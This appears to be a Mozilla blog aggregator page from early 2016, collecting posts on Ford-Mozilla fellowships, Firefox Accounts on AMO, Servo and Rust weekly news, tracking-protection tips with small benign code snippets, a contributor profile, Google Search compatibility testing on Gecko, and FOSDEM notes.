Data & Society is looking for a Fellow who is deeply versed in technical conversations, and understands that new massive technologies are creating disruption. This Fellow would work with people from other fields to raise the technical capacity of others in the network, and engage technical communities core to Data & Society’s mission. Learn more here.

Derechos Digitales
Derechos Digitales is an organization that promotes human rights in digital environments. Their work focuses on the nuanced realities of Latin American countries, and brings these perspectives to discussions around issues like cybersecurity and corporate transparency. They work to shape policy-making on issues such as mass surveillance, digital threats to activists, and legislative work on Internet governance. In 2016 they will focus on privacy, freedom of expression and access to knowledge.

Derechos Digitales is looking for a Fellow with tech expertise who is passionate about working at the intersection of human rights and tech policy in the global south. The Fellow could provide technical advice on the tools and resources needed in these contexts, and develop tech policy documents that can bridge the human rights and tech communities. Derechos Digitales is looking for a Spanish-speaking Fellow who would be comfortable supporting capacity-building sessions with local civil society organizations. Learn more here.

European Digital Rights (EDRi)
EDRi is an association of 33 civil rights organizations from across Europe, and works to promote, protect and uphold civil and human rights in the digital environment in the European Union. Their four key priorities for 2016 are data protection and privacy, mass surveillance, copyright reform and net neutrality. EDRi supports Europe’s data protection reform and campaigned against EU state surveillance proposals. The current onslaught of “counter-terrorism” proposals after recent attacks sees European governments adopting new laws with little consideration of effectiveness, proportionality, or whether privacy is being sacrificed.

EDRi is looking for a Fellow who is passionate about raising awareness about EU digital rights, and can use their technical expertise to help educate the general public, tech-policy community, and policy-makers. For example, the Fellow could explain existing data collection practices and newly gained online rights to users via an app or other tool, depending on the Fellow’s talents and preferences. The Fellow could provide technical assistance to help policy-makers and regulators understand the tools used by online companies for tracking and monitoring. Learn more here.

Freedom of the Press Foundation
Freedom of the Press Foundation is a non-profit organization that supports and defends journalism dedicated to transparency and accountability. They believe one of the most critical press freedom issues of the 21st Century is digital security, and work to ensure journalists can use technology to do their jobs safely and without the constant fear of surveillance.

Freedom of the Press Foundation is looking for a Fellow who has strong technical abilities and is interested in helping journalists work safely and communicate securely. The Fellow would apply their skills to build and support tools like SecureDrop, which helps journalists communicate securely with sources and whistleblowers, working alongside Freedom of the Press Foundation’s talented staff of technologists and engineers. Learn more here.

Privacy International
Privacy International focuses on privacy issues around the world. They advocate for strong privacy protection laws, investigate government surveillance, conduct research to enact policy change, and raise awareness amongst the public about technologies that place privacy at risk. In 2016 Privacy International is partnering with organizations in the global south to identify privacy challenges, and expanding its work on data exploitation.

Privacy International is looking for a Fellow who’s eager to learn and find new challenges. The Fellow would use their strong technical skills to translate technology to policy-makers, and help others around the world do the same. The Fellow would work with Privacy International’s Tech Team to analyze surveillance documentation and data, identify and analyze new technologies, and help develop briefings and educational programming with a technical understanding. Learn more here.

Apply now to become a Ford-Mozilla Open Web Fellow!
Deadline for applications: 11:59pm PST March 20, 2016

John O'Duinn“Distributed” ER#5 now available!

“Distributed” Early Release #5 is now publicly available, just 23 days after ER#4 came out.

Early Release #5 (ER#5) contains everything in ER#4 plus:
* Ch.12 group chat etiquette
* In Ch.2, the section on diversity was rewritten and enhanced by consolidating a few different passages that had been scattered across different chapters.
* Many tweaks/fixes to pre-existing Chapters.

You can buy ER#5 by clicking here, or clicking on the thumbnail of the book cover. Anyone who already has ER#1, ER#2, ER#3 or ER#4 should get prompted with a free update to ER#5 – if you don’t please let me know! And yes, you’ll get updated when ER#6 comes out later this month.

Thanks again to everyone for their ongoing encouragement, proof-reading help and feedback so far. I track all of them and review/edit/merge as fast as I can. To make sure that any feedback doesn’t get lost or caught in spam filters, please email comments to feedback at oduinn dot com.

Now time to brew more coffee and get back to typing!

ps: For the curious, here is the current list of chapters and their status:

Chapter 1: Remoties trend – AVAILABLE
Chapter 2: The real cost of an office – AVAILABLE
Chapter 3: Disaster Planning – AVAILABLE
Chapter 4: Mindset – AVAILABLE
Chapter 5: Physical Setup – AVAILABLE
Chapter 6: Video Etiquette – AVAILABLE
Chapter 7: Own your calendar – AVAILABLE
Chapter 8: Meetings – AVAILABLE
Chapter 9: Meeting Moderator – AVAILABLE
Chapter 10: Single Source of Truth
Chapter 11: Email Etiquette – AVAILABLE
Chapter 12: Group Chat Etiquette – AVAILABLE
Chapter 13: Culture, Trust and Conflict
Chapter 14: One-on-Ones and Reviews – AVAILABLE
Chapter 15: Joining and Leaving
Chapter 16: Bring Humans Together – AVAILABLE
Chapter 17: Career path – AVAILABLE
Chapter 18: Feed your soul – AVAILABLE
Chapter 19: Final Chapter


Mozilla Addons BlogFirefox Accounts on AMO

In order to provide a more consistent experience across all Mozilla products and services, AMO will soon begin using Firefox Accounts.

During the first stage of the migration, which will begin in a few weeks, you can continue logging in with your current credentials and use the site as you normally would. Once you’re logged in, you will be asked to log in with a Firefox Account to complete the migration. If you don’t have a Firefox Account, you can easily create one during this process.

Once you are done with the migration, everything associated with your AMO account, such as add-ons you’ve authored or comments you’ve written, will continue to be linked to your account.

A few weeks after that, when enough people have migrated to Firefox Accounts, old AMO logins will be disabled. This means when you log in with your old AMO credentials, you won’t be able to use the site until you follow the prompt to log in with or create a Firefox Account.

For more information, please take a look at the Frequently Asked Questions below, or head over to the forums. We’re here to help, and we apologize for any inconvenience.

Frequently asked questions

What happens to my add-ons when I convert to a new Firefox Account?

All of your add-ons will remain accessible from your new Firefox Account.

Why do I want a Firefox Account?

Firefox Accounts is the identity system that is used to synchronize Firefox across multiple devices. Many Firefox products and services will soon begin migrating over, simplifying your sign-in process and making it easier for you to manage all your accounts.

Where do I change my password?

Once you have a Firefox Account, you can go to, sign in, and click on Password.

If you have forgotten your current password:

  1. Go to the AMO login page
  2. Click on I forgot my password
  3. Proceed to reset the password

The Servo BlogThis Week In Servo 49

In the last week, we landed 87 PRs in the Servo organization’s repositories.

Mátyás Mustoha has been doing awesome work bringing fixes and stability to our cross-compilation to both AArch64 and ARM 32-bit. He has a nightly build that runs here, which we hope to integrate into our own CI systems. Thanks for your great work improving the experience targeting those platforms!

Notable Additions

  • pcwalton removed some potential deadlock situations in ipc-channel
  • ms2ger moved gaol (our sandboxing library) to the Servo organization and enabled CI support for it
  • manish upgraded homu to pick up a bunch of new updates, including UI cleanups!
  • nox upgraded our Rust build to January 31st
  • mmatyas added AArch64 support to gaol, and generally cleaned it up in other repos, too
  • larsberg added some instructions on how to build and run Servo on Windows
  • simon landed CSS Multicolumn support with block fragmentation

New Contributors


No screenshot this week.


We had a meeting on changing our weekly meeting time, our build time trend, potential student projects, and the Windows support.

Mitchell BakerDr. Karim Lakhani Appointed to Mozilla Corporation Board of Directors

As we just posted on the Mozilla Blog, today we are very pleased to announce an addition to the Mozilla Corporation Board of Directors, Dr. Karim Lakhani, a scholar in innovation theory and practice. Dr. Lakhani is the first of the new appointments we expect to make this year. We are working to expand our […]

The Mozilla BlogDr. Karim Lakhani Appointed to Mozilla Corporation Board of Directors

Image from Twitter @klakhani

Today we are very pleased to announce an addition to the Mozilla Corporation Board of Directors, Dr. Karim Lakhani, a scholar in innovation theory and practice.

Dr. Lakhani is the first of the new appointments we expect to make this year. We are working to expand our Board of Directors to reflect a broader range of perspectives on people, products, technology and diversity. That diversity encompasses many factors: from geography to gender identity and expression, cultural to ethnic identity, expertise to education.

Born in Pakistan and raised in Canada, Karim received his Ph.D. in Management from Massachusetts Institute of Technology (MIT) and is Associate Professor of Business Administration at the Harvard Business School, where he also serves as Principal Investigator for the Crowd Innovation Lab and NASA Tournament Lab at the Harvard University Institute for Quantitative Social Science.

Karim’s research focuses on open source communities and distributed models of innovation. Over the years I have regularly reached out to Karim for advice on topics related to open source and community based processes. I’ve always found the combination of his deep understanding of Mozilla’s mission and his research-based expertise to be extremely helpful. As an educator and expert in his field, he has developed frameworks of analysis around open source communities and leaderless management systems. He has many workshops, cases, presentations, and journal articles to his credit. He co-edited a book of essays about open source software titled Perspectives on Free and Open Source Software, and he recently co-edited the upcoming book Revolutionizing Innovation: Users, Communities and Openness, both from MIT Press.

However, what is most interesting to me is the “hands-on” nature of Karim’s research into community development and activities. He has been a supporter and ready advisor to me and Mozilla for a decade.

Please join me now in welcoming Dr. Karim Lakhani to the Board of Directors. He supports our continued investment in open innovation and joins us at the right time, in parallel with Katharina Borchert’s transition off of our Board of Directors into her role as our new Chief Innovation Officer. We are excited to extend our Mozilla network with these additions, as we continue to ensure that the Internet stays open and accessible to all.


Adam RoachBetter Living through Tracking Protection

There's been a bit of a hullabaloo in the press recently about blocking of ads in web browsers. Very little of the conversation is new, but the most recent round of discussion has been somewhat louder and more excited, in part because of Apple's recent decision to allow web content blockers on the iPhone and iPad.

In this latest round of salvos, the online ad industry has taken a pretty brutal beating, and key players appear to be rethinking long-entrenched strategies. Even the Interactive Advertising Bureau -- which has referred to ad blocking as "robbery" and "an extortionist scheme" -- has gone on record to admit that Internet ads got so bad that users basically had no choice but to start blocking them.

So maybe things will get better in the coming months and years, as online advertisers learn to moderate their behavior. Past behavior shows a spotty track record in this area, though, and change will come slowly. In the meanwhile, there are some pretty good tools that can help you take back control of your web experience.

How We Got Here

While we probably all remember the nadir of online advertising -- banners exhorting users to "punch the monkey to win $50", epilepsy-inducing ads for online gambling, and out-of-control popup ads for X10 cameras -- the truth is that most ad networks have already pulled back from the most obvious abuses of users' eyeballs. It would appear that annoying users into spending money isn't a winning strategy.

Unfortunately, the move away from hyperkinetic ads to more subtle ones was not a retreat as much as a carefully calculated refinement. Ads nowadays are served by colossal ad networks with tendrils on every site -- and they're accompanied by pretty sophisticated code designed to track you around the web.

The thought process that went into this is: if we can track you enough, we learn a lot about who you are and what your interests are. This is driven by the premise that people will be less annoyed by ads that actually fit their interests; and, at the same time, such ads are far more likely to convert into a sale.

Matching relevant ads to users was a reasonable goal. It should have been a win-win for both advertisers and consumers, as long as two key conditions were met: (1) the resulting system didn't otherwise ruin the web browsing experience, and (2) users who don't want to have their personal movements across the web could tell advertisers not to track them, and have those requests honored.

Neither is true.

Tracking Goes off the Rails

Just like advertisers went overboard with animated ads, pop-ups, pop-unders, noise-makers, interstitials, and all the other overtly offensive behavior, they've gone overboard with tracking.

You hear stories of overreach all the time: just last night, I had a friend recount how she got an email (via Gmail) from a friend that mentioned front-loaders, and had to suffer through weeks of banner ads for construction equipment on unrelated sites. The phenomenon is so bad and so well-known, even The Onion is making fun of it.

Beyond the "creepy" factor of having ad agencies building a huge personal profile for you and following you around the web to use it, user-tracking code itself has become so bloated as to ruin the entire web experience.

In fact, on popular sites such as CNN, code to track users can account for somewhere on the order of three times as much memory usage as the actual page content: a recent demo of the Firefox memory tracking tool found that 30 MB of the 40 MB used to render a news article on CNN was consumed by code whose sole purpose was user tracking.

This drags your browsing experience to a crawl.

Ad Networks Know Who Doesn't Want to be Tracked, But Don't Care.

Under the assumption that advertisers were actually willing to honor user choice, there has been a large effort to develop and standardize a way for users to indicate to ad networks that they didn't want to be tracked. It's been implemented by all major browsers, and endorsed by the FTC.

For this system to work, though, advertisers need to play ball: they need to honor user requests not to be tracked. As it turns out, advertisers aren't actually interested in honoring users' wishes; as before, they see a tiny sliver of utility in abusing web users with the misguided notion that this somehow translates into profits. Attempts to legislate conformance were made several years ago, but these never really got very far.

So what can you do? The balance of power seems so far out of whack that consumers have little choice but to sit back and take it.

You could, of course, run one of any number of ad blockers -- Adblock Plus is quite popular -- but this is a somewhat nuclear option. You're throwing out the slim selection of good players with the bad ones; and, let's face it, someone's gotta provide money to keep the lights on at your favorite website.

Even worse, many ad blockers employ techniques that consume as much (or more) memory and as much (or more) time as the trackers they're blocking -- and Adblock Plus is one of the worst offenders. They'll stop you from seeing the ads, but at the expense of slowing down everything you do on the web.

What you can do

When people ask me how to fix this, I recommend a set of three tools to make their browsing experience better: Firefox Tracking Protection, Ghostery, and (optionally) Privacy Badger. (While I'm focusing on Firefox here, it's worth noting that both Ghostery and Privacy Badger are also available for Chrome.)

1. Turn on Tracking Protection

Firefox Tracking Protection is automatically activated in recent versions of Firefox whenever you enter "Private Browsing" mode, but you can also manually turn it on to run all the time. If you go to the URL bar and type in "about:config", you'll get into the advanced configuration settings for Firefox (you may have to agree to be careful before it lets you in). Search for a setting called "privacy.trackingprotection.enabled", and then double-click next to it where it says "false" to change it to "true." Once you do that, Tracking Protection will stay on regardless of whether you're in private browsing mode.
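If you prefer setting it from a file, the same pref can go in a user.js in your Firefox profile directory, which is read at startup and applies the setting for you (a sketch; the pref name is the one from the steps above):

```js
// user.js, placed in your Firefox profile directory.
// Keeps Tracking Protection enabled outside Private Browsing too.
user_pref("privacy.trackingprotection.enabled", true);
```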

Firefox Tracking Protection uses a curated list of sites that are known to track you and known to ignore the "Do Not Track" setting. Basically, it's a list of known bad actors. And a study of web page load times determined that just turning it on improves page load times by a median of 44%.

2. Install and Configure Ghostery

There's also an add-on that works similarly to Tracking Protection, called Ghostery. Install it, and then go into its configuration (type "about:addons" into your URL bar, and select the "Preferences" button next to Ghostery). Now, scroll down to "blocking options," near the bottom of the page. Under the "Trackers" tab, click on "select all." Then, uncheck the "widgets" category. (Widgets can be used to track you, but they also frequently provide useful functions for a web page: they're a mixed bag, but I find that their utility outweighs their cost.)

Ghostery also uses a curated list, but it's far more aggressive in what it considers to be tracking. It also gives you fine-grained control over what you block, and lets you easily whitelist sites if you find that they're not working quite right with all the potential trackers removed.

Poke around at the other options in there, too. It's really a power user's tracker blocker.

3. Optionally, Install Privacy Badger

Unlike tracking protection and Ghostery, Privacy Badger isn't a curated list of known trackers. Instead, it's a tool that watches what webpages do. When it sees behavior that could be used to track users across multiple sites, it blocks that behavior from ever happening again. So, instead of knowing ahead of time what to block, it learns what to block. In other words, it picks up where the other two tools leave off.
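The learning idea can be sketched in a few lines of Python. This is not Privacy Badger's actual algorithm (its heuristics are considerably more involved); the class name, threshold, and domains below are invented for illustration:

```python
from collections import defaultdict

class HeuristicBlocker:
    """Learns trackers by observation: a third-party domain that sets
    identifying cookies on enough distinct first-party sites gets blocked."""

    def __init__(self, threshold=3):
        self.threshold = threshold
        self.seen_on = defaultdict(set)  # tracker domain -> first-party sites

    def observe(self, first_party, third_party, sets_cookie):
        """Record one observed third-party request made while visiting a site."""
        if sets_cookie and third_party != first_party:
            self.seen_on[third_party].add(first_party)

    def is_blocked(self, third_party):
        """Block once the domain has been seen tracking across enough sites."""
        return len(self.seen_on[third_party]) >= self.threshold

blocker = HeuristicBlocker()
for site in ["news.example", "shop.example", "blog.example"]:
    blocker.observe(site, "ads.example", sets_cookie=True)

assert blocker.is_blocked("ads.example")      # learned: seen on 3 distinct sites
assert not blocker.is_blocked("cdn.example")  # never observed tracking
```

The point of the sketch is the trade-off described above: nothing is blocked until tracking behavior has actually been seen, which is why a too-eager threshold can break legitimate widgets.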

This sounds really good on paper, and does work pretty well in practice. I ran with Privacy Badger turned on for about a month, with mostly good results. Unfortunately, its "learning" can be a bit aggressive, and I found that it broke sites far more frequently than Ghostery. So here's the trade-off: if you run Privacy Badger, you'll have much better protection against tracking, but you'll also have to be alert to the kinds of defects it can introduce, and turn it off when it interferes with what you're trying to do. Personally, I turned it off a few months ago and haven't bothered to reactivate it yet; but I'll be checking back periodically to see if they've tuned their algorithms (and their yellow-list) to be more user-friendly.

If you're interested in giving it a spin, you can download Privacy Badger from the website.

The Mozilla BlogMozilla, Caribou Digital Release Report Exploring the Global App Economy

Mozilla is a proud supporter of research carried out by Caribou Digital, the UK-based think tank dedicated to building sustainable digital economies in emerging markets. Today, Caribou has released a report exploring the impact of the global app economy and international trade flows in app stores. You can find it here.

The findings highlight the app economy’s unbalanced nature. While smartphones are helping connect billions more to the Web, the effects of the global app economy are not yet well understood. Key findings from our report include:

  • Most developers are located in high-income countries. The geography of where app developers are located is heavily skewed toward the economic powerhouses, with 81% of developers in high-income countries — which are also the most lucrative markets. The United States remains the dominant producer, but East Asia, fueled by China, is growing past Europe.
  • App stores are winner-take-all. The nature of app stores leads to winner-take-all markets, which skews value capture even more heavily toward the U.S. and other top producers. Conversely, even for those lower-income countries that do have a high number of developers — e.g., India — the amount of value captured is disproportionately small relative to the number of developers participating.
  • The emerging markets are the 1% — meaning, they earn 1% of total app economy revenue. 95% of the estimated value in the app economy is captured by just 10 countries, and 69% of the value is captured by just the top three countries. Excluding China, the 19 countries considered low- or lower-income accounted for only 1% of total worldwide value.
  • Developers in low-income countries struggle to export to the global stage. About one-third of developers in the sample appeared only in their domestic market. But this inability to export to other markets was much more pronounced for developers in low-income countries, where 70% of developers were not able to export, compared to high-income countries, where only 29% of developers were not able to export. For comparison, only 3% of U.S. developers did not export.
  • U.S. developers dominate almost all markets. On average, U.S. apps have 30% of the market across the 37 markets studied, and the U.S. is the dominant producer in every market except for China, Japan, South Korea, and Taiwan.

Mozilla is proud to support Caribou Digital’s research, and the goal of working toward a more inclusive Internet, rich with opportunity for all users. Understanding the effects of the global app economy, and helping to build a more inclusive mobile Web, are key. We invite readers to read the full report here, and Caribou Digital’s blog post here.


Several members of the QA team attended FOSDEM this year and gave presentations on a variety of subjects – both the BuddyUp Pilot Project and FxOS Automation were presented. All of the FOSDEM presentations were recorded and will eventually be available online. Mozilla also had a booth, staffed by a group of community members who volunteered to sit there and answer questions. There was a VR display as well as some FxOS devices on display.

You can read more about the event here.

Pictures of the event are here.

Andrew SutherlandAn email conversation summary visualization

We’ve been overhauling the Firefox OS Gaia Email app and its back-end to understand email conversations.  I also created a react.js-based desktop-ish development UI, glodastrophe, that consumes the same back-end.

My first attempt at summaries for glodastrophe was the following:

old summaries; 3 message tidbits

The back-end derives a conversation summary object from all of the messages that make up the conversation whenever any message in the conversation changes.  While there are some things that are always computed (the number of messages in the conversation, whether there are any unread messages, any starred/flagged messages, etc.), the back-end also provides hooks for the front-end to provide application logic to do its own processing to meet its UI needs.

In the case of this conversation summary, the application logic finds the first 3 unread messages in the conversation and stashes their date, author, and extracted snippet (if any) in a list of “tidbits”.  This also is used to determine the height of the conversation summary in the conversation list.  (The virtual list is aware of a quantized coordinate space where each conversation summary object is between 1 and 4 units high in this case.)
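The real back-end is JavaScript, but the shape of that application-logic hook can be sketched in Python. The field names and the height formula here are illustrative assumptions, not the actual Gaia code:

```python
def summarize(messages, max_tidbits=3):
    """Derive a conversation summary: always-computed aggregates plus
    app-provided 'tidbits' taken from the first few unread messages."""
    unread = [m for m in messages if not m["read"]]
    tidbits = [
        {"date": m["date"], "author": m["author"], "snippet": m.get("snippet")}
        for m in unread[:max_tidbits]
    ]
    return {
        "message_count": len(messages),
        "has_unread": bool(unread),
        "tidbits": tidbits,
        # Quantized height for the virtual list: 1 base unit plus 1 per
        # tidbit, capped at 4 units as described above.
        "height_units": min(1 + len(tidbits), 4),
    }

msgs = [
    {"read": True,  "date": "2016-02-01", "author": "A", "snippet": "hi"},
    {"read": False, "date": "2016-02-02", "author": "B", "snippet": "re: hi"},
    {"read": False, "date": "2016-02-03", "author": "C", "snippet": "more"},
]
summary = summarize(msgs)  # 2 tidbits, so the row is 3 units high
```

The summary would be recomputed whenever any message in the conversation changes, mirroring the behavior described above.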

While this is interesting because it’s something Thunderbird’s thread pane could not do, it’s not clear that the tidbits are an efficient use of screen real-estate.  At least not when the number of unread messages in the conversation exceeds the 3 we cap the tidbits at.

time-based thread summary visualization

But our app logic can actually do anything it wants.  It could, say, establish the threading relationship of the messages in the conversation, enabling us to make a highly dubious visualization of the thread structure as well as show the activity in the conversation over time.  Much like the visualization you already saw before you read this sentence.  We can see the rhythm of the conversation.  We can know whether this is a highly active conversation that’s still ongoing, or just one that someone has brought back to life.

Here’s the same visualization where we still use the d3 cluster layout but don’t clobber the x-position with our manual-quasi-logarithmic time-based scale:

the visualization without time-based x-positioning

Disclaimer: This visualization is ridiculously impractical in cases where a conversation has only a small number of messages.  But a neat thing is that the application logic could decide to use textual tidbits for small numbers of unread and a cool graph for larger numbers.  The graph’s vertical height could even vary based on the number of messages in the conversation.  Or the visualization could use thread-arcs if you like visualizations but want them based on actual research.

If you’re interested in the moving pieces in the implementation, they’re here:

QMODavid Weir: friendly with belief in team work and contribution

David Weir has been involved with Mozilla since 2009. He is from Glasgow, Scotland where he has recently graduated from Glasgow Kelvin College with skills in digital media. In his spare time, he volunteers at local organisations that aim to promote the quality of life in Glasgow’s East End community.

David is from Scotland in Europe.


Hi David! How did you discover the Web?

I used to write letters the old-fashioned way with ink and paper till I got an email address and discovered the Internet. I started going online for stuff like applying for jobs. That’s how I discovered the Web.

How did you hear about Mozilla?

I used Internet Explorer before I found out about Firefox from an advertisement on Facebook.

How and why did you start contributing to Mozilla?

I was a newbie Firefox user and I liked it. As I got to understand it better, I decided to help out other users on live chat. I became a part of SUMO. To date, I’ve answered 39 questions, written 27 documents and earned 3 badges on SUMO.

Have you contributed to any other Mozilla projects in any other way?

I am a community contributor to the QA team. I actively participate in discussions during team meetings, email threads, and IRC. I’ve recently arranged testdays for Windows 10, Windows Nightly 64-bit, Firefox for Android and Firefox for Desktop.

I contribute code to SuMoBot, an IRC bot in Mozilla’s #SuMo IRC channel.

I’m part of Firefox Friends, a team of social-sharers and word-spreaders to promote Firefox. I help run the Mozilla contributor group on Facebook, and I keep an eye out for Mozilla-related news spreading around social channels.

I am a Mozilla Rep and actively recruit Mozillians.

What’s the contribution you’re the most proud of?

I have some disability in the form of visual impairment and autism; my hand-eye co-ordination is not perfect. I help to make the web more accessible for people with disability. I look at Mozilla websites and if I find things like the text is too dark to read, I notify the developers to make fixes for better accessibility. See bugs 721518, 746251, 770248 and 775318.

You belong to the Mozilla UK community. Please tell us more about your community. Is there anything you find particularly interesting or special about it?

The Mozilla UK community consists of a small number of employees and volunteers scattered around the United Kingdom. There is a Community Space in London. Every year in November, community members help to host the Mozilla Festival. Since only a few employees work in the London office, most meetings happen online. You can find us on the #uk IRC channel. Community discussion happens on Discourse.

A recent landmark achievement for the UK community was the rollout of the en-GB locale for Mozilla’s web properties, including the main Mozilla website. I personally contributed to the en-GB localization; see bugs 1190535 and 1188470.

There is a Scottish community within the larger UK community; its members can download Mozilla products localized in Gaelic and discuss support issues on the Gaelic-language discussion forum Fòram na Gàidhlig.

What advice would you give to someone who is new and interested in contributing to Mozilla?

Mozilla is one of the most friendly communities I have ever volunteered with. The whole staff is behind you.

If you had one word or sentence to describe Mozilla, what would it be?

Lots of stuff happening – get involved!

What exciting things do you envision for you and Mozilla in the future?

A Scottish community space would be nice.

The Mozilla QA and SUMO teams would like to thank David Weir for his contributions over the past 7 years.

David has contributed to the Mozilla project for a few years now. I’ve frequently had the opportunity to interact with him through IRC. We would also get to say “hi!” to him face-to-face every so often, because he would attend our weekly team meetings through teleconferencing. I remember he initially started out attending “testdays” where he would help us test new features in Firefox. Later, his collaboration evolved into organizing his own testdays to address issues he identified as problematic. He’s been a very enthusiastic contributor, and he’s never been shy about pointing out when and where we could be doing better, for example in terms of sharing documentation, or any other information that could be helpful to other contributors. He has made a memorable impression on me and enriched my Mozilla experience, and I hope he keeps participating in the project. – Juan Carlos Becerra

Every team at Mozilla would be lucky to have a contributor like David (IRC nick satdav). He’s committed, the first to know about anything new going on in our social contributor community, and always open with ideas for how we can improve our programs. – Elizabeth Hull

Over the last few years satdav has stayed on top of many support and QA issues, often bringing new bugs that affect the user community to developer attention. That’s so helpful! He shows up to a wide range of Firefox meetings and IRC channels, and has a good idea of who to ask to get more information on a bug. Because he has a broad and general interest and is not afraid to ask questions, he also sometimes works as a cross-team communicator, letting people know what’s going on in other meetings or discussions. I think of him as one of those people who, in a science fiction future, would be in a spaceship mission control center with 20 monitors, listening on many channels at once. It has been cool to see his enthusiasm on Mozilla projects and to see his knowledge deepen! – Liz Henry

Karl DubostTesting Google Search On Gecko With Different UA Strings

Google is serving very different versions of its services to individual browsers and devices. A bit more than one year ago, I had listed some of the bugs Firefox was facing when accessing Google properties (btw, I need to go through this list again). Sometimes we were not served the tier 1 experience that Chrome was receiving. Sometimes it was just completely broken.

We have an open channel of discussion with Google. Google is also not a monolithic organization; different services have different philosophies with regard to fixing bugs or Web compatibility issues. The good news is that things are improving.

Three Small Important Things About Google Today

  1. mike was looking for usage of the -webkit-mask-* CSS properties on the Web. I was about to reply "Google Search!", which used -webkit-mask-image in the version it sends to the Chrome browser, but decided to look at the bug again. To my big surprise, they have switched to an SVG icon. Wonderful!
  2. So it was time for me to test Google Search on Gecko one more time, with both the Firefox Android UA and the Chrome UA. See below.
  3. Tantek started some discussion in the CSS Working Group about Web compatibility issues, including one about getting the members of the CSS Working Group to fix their Web properties.

Testing Google Search on Gecko and Blink

For each test, the first two screenshots are taken on the mobile device itself (Chrome, then Firefox). The third screenshot shows the same site with a Chrome user agent string, but as displayed by Gecko on Desktop. Basically, this third one tests: if Google sent Firefox on Android the same version it serves to Chrome, would it work?
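A crude way to reproduce that setup outside a browser is to fetch the page with a spoofed User-Agent header and inspect what each browser is served. A sketch (the UA strings and helper names are illustrative, not the exact ones used for the screenshots):

```python
import urllib.request

# Illustrative UA strings for the two mobile browsers being compared.
CHROME_ANDROID_UA = ("Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 "
                     "(KHTML, like Gecko) Chrome/47.0.2526.83 Mobile Safari/537.36")
FIREFOX_ANDROID_UA = "Mozilla/5.0 (Android 5.0; Mobile; rv:44.0) Gecko/44.0 Firefox/44.0"

def build_request(url, user_agent):
    """Build a request that claims to come from another browser, so the
    server-selected variant can be fetched and inspected."""
    return urllib.request.Request(url, headers={"User-Agent": user_agent})

def fetch(url, user_agent):
    """Fetch the markup a server sends to the given user agent."""
    with urllib.request.urlopen(build_request(url, user_agent)) as resp:
        return resp.read().decode("utf-8", errors="replace")

# Compare what each UA receives, e.g.:
# chrome_html = fetch("https://www.google.com/", CHROME_ANDROID_UA)
# firefox_html = fetch("https://www.google.com/", FIREFOX_ANDROID_UA)
```

Diffing the two responses gives a rough idea of whether the server is branching on the UA string at all, before loading the Chrome variant in Gecko.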

Home page

We reached the home page of Google.

home page

Home page - search term results

We typed the word "Japan".

home page with search term

Home page - scrolling down

We scrolled down a bit.

scrolling down the page

Home page - bottom

We reached the bottom of the page.

Bottom of the page

Google Images with the search term

We go back to the top of the page and tap on Images menu.

Accessing Google image

Google Images when image has been tapped

We tap on the first image.

focus on the image


We are not there yet. The issue is complex because of the large number of versions served to different browsers and devices, but there is definite progress. At first sight, the version sent to Chrome is compatible with Firefox. We would still need to test while logged in, plus all the corner cases of the tools and menus. But it's a lot, lot better than it used to be. We have never been this close to an acceptable user experience.

Daniel StenbergMy HTTP/2 slide updates

My first HTTP/2 talk of the year I did for OWASP Stockholm on January 27th, and I subsequently updated my public slide set:

On slideshare here: Http2

I then did a shorter talk at FOSDEM 2016 on January 30th that I called “an HTTP/2 update”. In 25 rushed minutes I presented these slides:

This Week In RustThis Week in Rust 116

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us an email! Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

This week's edition was edited by: nasa42, brson, and llogiq.

Updates from Rust Community

News & Blog Posts

Notable New Crates & Project Updates

Updates from Rust Core

114 pull requests were merged in the last week.

See the triage digest and subteam reports for more details.

Notable changes

New Contributors

  • Ali Clark
  • Daan Sprenkels
  • ggomez
  • tgor
  • Thomas Wickham
  • Tomasz Miąsko
  • Vincent Esche

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now. This week's FCPs are:

New RFCs

Upcoming Events

If you are running a Rust event please add it to the calendar to get it mentioned here. Email Erick Tryzelaar or Brian Anderson for access.

fn work(on: RustProject) -> Money

Tweet us at @ThisWeekInRust to get your job offers listed here!

Crate of the Week

This week's Crate of the Week is herbie-lint, a miraculous compiler plugin to check the numerical stability of floating-point operations in the code. Another reason to have a nightly Rust handy.

Thanks to redditor protestor for the suggestion.

Submit your suggestions for next week!

Quote of the Week

imo: the opinionated version of mio

durka42 on #rust

Thanks to Steve Klabnik for the suggestion.

Submit your quotes for next week!

Daniel, HTTPS and h2

I previously mentioned my slow-moving plan to get all my sites and servers onto HTTPS and HTTP/2. As of now, I’ve started to activate HTTPS for sites that run on our server and that I admin. First in the list are this host and the curl web site. There are plenty more to set up, but the plan is to have the most important ones on HTTPS really soon.

If you experience problems with any of these, let me know. The long-term plan involves going HTTPS-only for all of them.

Ludovic HirlimannFosdem 2016 day 2

Day 2 was a bit different from day 1, as I was less tired. It started with me visiting a few booths in order to decorate my bag and get a few more T-shirts, thanks to wiki-mania, Apache, and Open Stack. I got back the mini-port to VGA cable I had left in the conference room and then headed for the conferences.

The first one, “Active supervision and monitoring with Salt, Graphite and Grafana”, was interesting because I knew nothing about any of these except for Graphite, and even there I knew so little that I learned a lot.

The second one, titled “War Story: Puppet in a Traditional Enterprise”, was about someone implementing Puppet at enterprise scale in a big company. It reminded me of all the big companies I had consulted for a few years back - nothing surprising. It was quite interesting anyway.

The third talk I attended was about hardening and securing configuration management software. It was more about general principles than a howto. Quite interesting, especially the links to documentation given at the end, and the idea to remove ssh if possible on all servers and enable it through configuration management only when investigating issues. I didn’t learn much, but it was a good refresher.

I then attended a talk, in a very small room that was packed, packed, packed, about mapping with your phone. As I’ve started contributing to OSM, it was nice to listen and discover all the other apps I can run on my droid phone in order to add data to the maps. I’ll probably share that next month at the local OSM meeting that got announced this week-end.

Last but not least, I attended the key signing party. According to my paperwork, I’ll have to sign 98 keys twice (twice because I’m creating a new key).

I’ve of course added a few pictures to my Fosdem set.

Kartikaya GuptaFrameworks vs libraries (or: process shifts at Mozilla)

At some point in the past, I learned about the difference between frameworks and libraries, and it struck me as a really important conceptual distinction that extends far beyond just software. It's really a distinction in process, and that applies everywhere.

